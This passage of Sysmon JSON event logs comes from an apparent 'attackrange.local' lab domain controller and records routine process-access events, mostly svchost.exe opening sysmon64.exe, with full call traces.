C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:23.644","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2841,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:23.644\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:23.644","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2842,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:23.644\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:23.644","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2843,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:23.644\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:23.644","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2844,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:23.644\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:23.644","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2845,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:23.644\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:23.644","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2846,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:23.644\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:23.644","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2847,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:23.644\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:23.644","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2848,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:23.644\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10AF-5F25-0000-00100DEC0400}\r\nTargetProcessId: 2692\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 